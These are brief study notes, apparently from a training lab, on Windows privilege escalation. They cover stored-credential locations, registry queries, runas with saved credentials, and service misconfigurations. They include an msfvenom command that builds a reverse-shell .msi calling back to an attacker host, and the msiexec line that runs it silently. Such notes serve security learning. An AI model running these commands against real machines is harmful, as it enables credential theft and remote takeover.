Windows Privilege Escalation

Windows Privilege Escalation

Unattended Windows Installations

  • automated installation of windows on large number of hosts
  • setup files usually stored in
    • C:\Unattend.xml
    • C:\Windows\Panther\Unattend.xml
    • C:\Windows\Panther\Unattend\Unattend.xml
    • C:\Windows\system32\sysprep.inf
    • C:\Windows\system32\sysprep\sysprep.xml
    • credentials stored in <Credentials> ... </Credentials> blocks

Powershell History

  • using cmd.exe run type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • using powershell run type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

  • to list other users credentials
    • cmdkey /list
  • to use one of those credentials to run cmd.exe
    • runas /savecred /user:<username> cmd.exe

IIS Configuration

  • Internet Information Service
  • default web server on windows installations
  • passwords for databases or authentication could be stored in
    • C:\inetpub\wwwroot\web.config
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
    • to quickly find database connection strings
      • type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from Software: PuTTY

  • search credentials in registry key ProxyPassword
    • reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks

  • like cron jobs
  • list scheduled tasks using schtasks
  • for detailed information use schtasks /query /tn <taskname> /fo list /v
  • to check file permissions icacls

AlwaysInstallElevated

  • .msi files usually run with the privilege level of user that runs it
  • can be configured to run wigh higher privileges from any user account
  • requires two registry values to be set
    • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
  • if both set, can generate malicious .msi file using msfvenom
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.244.190 LPORT=LOCAL_PORT -f msi -o malicious.msi
    • run using msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Abusing Service Misconfigurations

  • services managed by SCM, Service Control Manager
  • inspect services using sc qc <service name>

Insecure Permissions on Service Executable

  • if executable of service has weak permissions
  • can be replaced or modified

Unquoted Service Paths

  • when path to associated executable is not properly quoted to account for spaces
Last modified 2023.10.27